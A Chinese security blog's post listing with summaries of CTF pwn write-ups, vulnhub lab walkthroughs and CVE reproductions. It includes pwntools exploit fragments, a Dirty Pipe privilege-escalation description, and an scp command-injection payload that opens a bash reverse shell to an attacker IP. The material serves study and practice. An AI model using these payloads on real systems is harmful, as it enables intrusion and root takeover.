- 博客(113)
- 资源 (2)
- 收藏
- 关注
原创 第一届古剑山ctf-pwn全部题解
首先可以通过unsorted bin attack将unsorted bin(av)写入到堆数组中,等会就可以随意修改unsorted bin的fd和bk指针了,从而达到往unsorted bin中链入fake chunk的目的。所以chunk地址伪造成0x6020e8,它的bk正好是heap[0]满足要求,最后申请到bss段上的chunk,就可以修改某一个数组的值为free_got值,然后修改其为puts函数,泄露libc,最后再改成system即可。为了图省事,就直接打sub_804857B的溢出了。
2023-12-13 14:39:40
1472
1
原创 2023SICTF ROUND2 baby_heap
就是在申请堆块的时候会先从small bin中找有没有空闲的堆块,其中的bin,是根据main_arena和上申请堆块大小在small bin中的索引得到的,其实也是main_arena+xx,所以可以修改伪造其中有堆块,需要满足victim->bk->fd==victim,所以在堆上伪造就行了,有点像unlink,但是比它简单,最后就是和思路一样了,前面的思路也一样。思路三:在unsorted bin中伪造一个fake chunk,需要满足的条件是。
2023-09-12 22:21:27
529
1
原创 vulnhub靶机-Corrosion:2
1、找到靶机ip:192.168.1.106nmap -sn 192.168.1.0/242、扫描靶机端口,开放22、80和8080端口
2022-05-03 11:50:33
695
原创 2022DASCTF Apr X FATE 防疫挑战赛 good_luck
这道题最开始的附件,代码是随机生成一个0~199的数,然后0触发格式化字符串漏洞,1触发栈溢出漏洞,修改后的附件随机数是0或者1下面是脚本,脚本逻辑:通过栈溢出返回到格式化字符串漏洞函数,泄露libc地址,然后再返回到main函数,通过栈溢出执行onegadget几率:第一次执行栈溢出1/2,第二次再次执行栈溢出1/2,1/4的概率执行成功from pwn import *from LibcSearcher import *context(log_level = "debug")csu
2022-04-24 19:03:17
848
原创 两道pwn题中的小trick
1、get_started_3dsctf_2016比较常规的解法: 由于这题没有出现setbuf(stdin,0),所以本题的输出是缓存在服务器本地的,换句话说:如果程序不正常退出,本题是不会回显flag的。但是本题提供了exit()函数,注意再调用get_flag函数后再ret到exit()函数就可以回显flag了。参考:buuoj get_started_3dsctf_2016 WriteUp - CSULuyao - 博客园from pwn import *import sy
2022-04-19 18:39:07
301
原创 ciscn_2019_c_1
坑点:ida反编译地址不对解决办法:通过ROPdadget工具获得正确的pop_rdi和ret的地址问题:libc版本寻找解决:通过LibcSearcher工具进行寻找难点(写这篇文章的目的):这个问题和我前两篇checkin脚本分析最后自己写的一个脚本出现同样的情况,因为题目环境是Ubuntu18,所以需要栈对齐-----地址末尾为0,所以需要加ret不加ret之前的rsp地址加了ret后最后的脚本,python3环境,上述libcsearcher工具要求..
2022-04-14 11:31:28
2996
原创 ret2csu和ret2dlresolve x86&x64
ret2csu函数csu_front_addr = 0x400790 # mov rdx, r14csu_end_addr = 0x4007AA # add rsp, 8#根据glibc的版本不同参数的位置也要进行相应的调整def csu(rbx, rbp, r12, r15, r14, r13): # pop rbx, rbp, r12, r13, r14, r15 # rbx = 0 # rbp = 1, enable not to
2022-04-11 23:14:38
581
原创 2022DASCTF X SU 三月春季挑战赛 checkin 各种脚本学习分析
只能溢出0x10个字节,刚好能够覆盖返回地址,所以得利用栈迁移来做第一种:利用magic_gadget修改got表中setvbuf的值在64位程序的_do_global_dtors_aux中有这么一个gadget十分有用,可以直接改栈数据magic_gadget:add dword ptr [rbp - 0x3d], ebx ; nop ; ret利用read函数溢出,迁移栈到bss段上,然后通过一些小gadget调整寄存器的值来达到目的出处:2022DASCTFXSU三月春季挑战赛-p
2022-04-03 15:39:18
4728
9
原创 vulnhub靶机-THALES: 1
1、找到靶机ip:192.168.1.106nmap -sn 192.168.1.0/242、扫描靶机端口,开放22和8080端口 3、先搜索对应中间件有没有公开漏洞,没有发现,于是先从8080端口入手,访问之后是一个tomcat服务默认页面,先扫描一下目录可疑的就只有shell目录,但是访问就一直转圈,跟平常反弹shell的页面一样,所以猜测应该是作者测试时上传的,结合tomcat和shell目录,可以猜想应该是tomcat后台布置war包getshell,但是管理后台需要...
2022-03-18 23:24:36
4761
3
原创 CVE-2022-0847漏洞复现
The Dirty Pipe Vulnerability漏洞摘要 Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel 存在安全漏洞,该漏洞源于新管道缓冲区结构的“flag”变量在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确初始化。非特权本地用户利用该漏洞可以提升权限至root。 它允许覆盖任意只读文件中的数据,非特权用户通过替换/etc/passwd文件中roo
2022-03-09 20:52:48
5483
原创 vulnhub靶机-JANGOW: 1.0.1
DescriptionBack to the TopDifficulty: easyThe secret to this box is enumeration! Inquiries jangow2021@gmail.comThis works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.01、开机(virtualbox)直接得到靶机ip:192.16.
2022-03-08 13:34:39
4405
2
原创 vulnhub靶机-Raven: 2
1、找到靶机ip:192.168.134.130nmap -sn 192.168.134.0/242、扫描靶机端口,开放22、80、111和33222端口┌──(root????cracer)-[~]└─# nmap -p- -A 192.168.134.130Starting Nmap 7.91 ( https://nmap.org )Nmap scan report for raven.local (192.168.134.130)Host is up (0.00055s l
2021-11-15 11:54:33
3799
原创 vulnhub靶机-DEATHNOTE: 1
1、找到靶机ip:192.168.43.11nmap -sn 192.168.43.0/242、扫描靶机端口,只开放22和80端口┌──(root????cracer)-[~]└─# nmap -p- -A 192.168.43.11 Starting Nmap 7.91 ( https://nmap.org )Nmap scan report for deathnote (192.168.43.11)Host is up (0.0012s latency).Not shown
2021-10-24 22:58:18
6241
原创 vulnhub靶机-DIGITALWORLD.LOCAL: SNAKEOIL
1、找到靶机ip:192.168.162.132nmap -sn 192.168.162.0/242、扫描靶机端口,发现开放22和80端口┌──(root????kali)-[~]└─# nmap -A -p- 192.168.116.132Starting Nmap 7.91 ( https://nmap.org )Nmap scan report for 192.168.116.132Host is up (0.00033s latency).Not shown: 65533 c
2021-09-10 14:09:34
1857
4
原创 vulnhub靶机-DarkHole: 1
靶机描述:Difficulty: EasyIt's a box for beginners, but not easy, Good LuckHint: Don't waste your time For Brute-Force1、找到靶机ip:192.168.162.132nmap -sn 192.168.162.0/242、扫描靶机端口,发现开放22和80端口┌──(root????kali)-[~]└─# nmap -A -p- 192.168.116.132
2021-08-25 01:00:58
1104
原创 vulnhub靶机-Corrosion
1、找到靶机ip:192.168.162.131nmap -sn 192.168.162.0/242、扫描靶机端口,发现开放22和80端口┌──(root????cracer)-[~]└─# nmap -A -p- 192.168.162.131Starting Nmap 7.91 ( https://nmap.org )Nmap scan report for 192.168.162.131Host is up (0.00067s latency).
2021-08-16 03:29:42
811
原创 vulnhub靶机-Netstart: 1
1、找到靶机ip:192.168.75.21nmap -sn 192.168.75.0/242、扫描靶机端口root@chounana:~# nmap -A -p- 192.168.75.21Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.75.21Host is up (0.00047s latency).Not shown: 65534 closed portsPORT STATE
2021-02-10 22:06:33
561
原创 vulnhub靶机-School: 1
1、找到靶机ip:192.168.75.18nmap -sn 192.168.75.0/242、扫描靶机端口root@chounana:~# nmap -p- -A 192.168.75.18Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.75.18Host is up (0.00042s latency).Not shown: 65532 closed portsPORT STATE
2021-02-06 14:35:36
2315
原创 vulnhub靶机-ODIN: 1
靶机描述:1、找到靶机ip:192.168.75.14nmap -sn 192.168.75.142、扫描靶机端口root@chounana:~# nmap -p- -A 192.168.75.14Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for odin (192.168.75.14)Host is up (0.00047s latency).Not shown: 65534 closed ports
2021-01-06 19:52:15
2095
3
原创 vulnhub靶机-JETTY: 1
靶机描述:1、找到靶机ip:192.168.75.12nmap -sn 192.168.75.0/242、扫描靶机端口root@chounana:~# nmap -p- -A 192.168.75.12Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-04 16:00 CSTNmap scan report for 192.168.75.12Host is up (0.00044s latency).Not shown:
2021-01-04 17:07:37
1603
原创 vulnhub靶机-CHILL HACK: 1
靶机描述:提示枚举1、找到靶机ip:192.168.74.135nmap -sn 192.168.74.0/242、扫描靶机端口root@kali:~# nmap -A -p- 192.168.74.135Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.74.135Host is up (0.0044s latency).Not shown: 65532 closed portsPO
2020-12-21 16:41:47
1097
原创 vulnhub靶机-Y0USEF: 1
1、找到靶机ip:192.168.75.11nmap -sn 192.168.75.0/242、扫描靶机端口root@chounana:~# nmap -p- -A 192.168.75.11Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.75.11Host is up (0.00038s latency).Not shown: 65533 closed portsPORT STATE
2020-12-17 20:17:50
1352
原创 FUNBOX-5: NEXT LEVEL
1、找到靶机ip:192.168.75.10nmap -sn 192.168.75.0/242、扫描靶机端口root@chounana:~# nmap -p- -A 192.168.75.10Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.75.10Host is up (0.00044s latency).Not shown: 65533 filtered portsPORT STAT
2020-12-02 16:48:49
830
1
原创 FunBox-4: CTF
1、使用下面的命令找到靶机ip:192.168.75.9nmap -sn 192.168.75.0/242、扫描靶机端口3、看到有80端口,访问是一个默认的apache页面,扫描目录也扫不出东西,但是在这个靶机下载的页面作者是给了提示的,注意大小写,换了大写之后,发现有一个ROBOTS.TXT文件,访问发现有upload目录但是直接访问又显示没有,但是在那个ROBOTS.TXT页面下右边有个滚动条,这是藏信息的惯用操作了,发现另一个目录访问显示403,想到拼上刚刚的
2020-11-30 16:43:02
708
原创 vulnhub靶机-Mrr3b0t
程序员节,写篇文章意思意思,这个靶机比较考脑洞,前面还有一个隐写的技巧(用到的网站挺好的),适合打ctf的人做由于ip获取不对,所1、找到靶机ip:192.168.43.201nmap -sn 192.168.43.0/242、扫描靶机端口root@kali:~# nmap -A -p- 192.168.43.201Starting Nmap 7.80 ( https://nmap.org )Stats: 0:00:52 elapsed; 0 hosts completed
2020-10-24 11:49:33
772
原创 vulnhub靶机-FIRSTBLOOD: 1
绪论:这个靶机比较简单,因为每一步都有提示,而且基本命令都给出来了1、找到靶机ip:192.168.74.130nmap -sn 192.168.74.0/242、扫描靶机端口,得到80端口和60022端口(ssh服务)root@kali:~# nmap -A -p- 192.168.74.130Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.74.130Host is up (0.000
2020-09-25 16:26:53
1900
原创 vulnhub靶机-So Simple: 1
1、靶机开机即得ip地址:192.168.8.1092、扫描靶机端口root@kali:~# nmap -A -p- 192.168.8.109Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for so-simple (192.168.8.109)Host is up (0.00056s latency).Not shown: 65532 closed portsPORT STATE SERVICE VERSION
2020-08-10 20:37:11
1356
1
原创 vulnhub靶机-Photographer: 1
1、找到靶机ip:192.168.8.168nmap -sn 192.168.8.0/242、扫描靶机端口root@kali:~# nmap -A -p- 192.168.8.168Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for photographer (192.168.8.168)Host is up (0.00051s latency).Not shown: 65531 closed portsPOR
2020-08-09 21:54:30
2514
原创 CVE-2020-15778漏洞复现
产品:Openssh影响的组件:SCP漏洞版本:<= openssh-8.3p1scp命令引发的命令注入反弹shell的payloadscp 1.txt cracer@受害机ip:'`bash -i >& /dev/tcp/攻击机ip/4444 0>&1`/tmp/test.txt'实战测试,这里使用本机进行测试1、查看ssh版本,符合漏洞版本ssh -V2、先在本地新建好文件,用于上传2、本地开启监听3、使用s.
2020-08-04 20:17:49
11854
5
原创 vulnhub靶机-CyberSploit: 2
1、找到靶机ip:192.168.0.131nmap -sn 192.168.0.0/242、扫描靶机端口root@kali:~# nmap -p- -A 192.168.0.130Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.130Host is up (0.00070s latency).Not shown: 65533 closed portsPORT STATE SERV
2020-07-20 22:14:29
862
2
原创 vulnhub靶机-CyberSploit: 1
这个系列的靶机解密部分有点像ctf的杂项,两个靶机都比较简单1、找到靶机ip:192.168.0.130nmap -sn 192.168.0.0/242、扫描靶机端口3、访问80端口,动图还不错,F12查看源码发现一个用户名itsskv4、手动尝试一下robots.txt文件,发现一串密文,base64解密得到flag1root@kali:~# echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1..
2020-07-20 21:34:37
1466
原创 vulnhub靶机-sunset:decoy
1、找到靶机ip:192.168.0.129nmap -sn 192.168.0.0/242、扫描靶机端口,除了22、80是开放状态,其他几个都是过滤状态root@kali:~# nmap -p- -A 192.168.0.129Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.129Host is up (0.0057s latency).Not shown: 65528 closed p
2020-07-20 16:22:45
1841
原创 vulnhub靶机-sunset:sunrise
1、找到靶机ip:192.168.0.128nma -sn 192.168.0.0/242、扫描靶机端口root@kali:~# nmap -p- -A 192.168.0.128Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.128Host is up (0.00044s latency).Not shown: 65531 closed portsPORT STATE SERVIC
2020-07-19 18:21:47
1262
原创 vulnhub靶机-sunset:dusk
1、获取靶机ip:192.168.0.127nmap -sn 192.168.0.0/242、扫描靶机端口root@kali:~# nmap -p- -A 192.168.0.127Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.127Host is up (0.00097s latency).Not shown: 65529 closed portsPORT STATE SER
2020-07-18 18:56:47
1138
原创 vulnhub靶机-sunset:nightfall
1、找到靶机ip:192.168.0.125nmap -sn 192.168.0.0/242、扫描靶机端口root@kali:~# nmap -A -p- 192.168.0.125Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.125Host is up (0.0018s latency).Not shown: 65529 closed portsPORT STATE SERV
2020-07-17 22:31:18
905
原创 vulnhub靶机-sunset:dawn
1、找到靶机ip:192.168.0.123nmap 192.168.0.0/24 2、扫描靶机端口root@kali:~# nmap -A -p- 192.168.0.123Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.123Host is up (0.0090s latency).Not shown: 65531 closed portsPORT STATE SERV
2020-07-16 20:45:33
1252
原创 vulnhub靶机-sunset:1
这个靶机比较容易,水一篇,后面接着写这个sunset系列1、找到靶机ip:192.168.0.122nmap -sn 192.168.0.0/242、扫描靶机端口oot@kali:~# nmap -sn 192.168.0.0/24Starting Nmap 7.80 ( https://nmap.org )Nmap scan report for 192.168.0.1Host is up (0.0016s latency).MAC Address: 8C:21:0A:BC
2020-07-15 17:57:14
1576
原创 vulnhub靶机-Pwned
有这么久没写了,这次就写一下目前vulnhub最新出的靶机Pwned,目的是拿到3个flag,难度是easy,但是较我以往的博客多了一种提权方式1、寻找靶机地址:192.168.0.118nmap -sn 192.168.0.0/242、扫描靶机开放端口root@kali:~# nmap -p- -A 192.168.0.118Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.118.
2020-07-14 17:08:25
2077
2
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人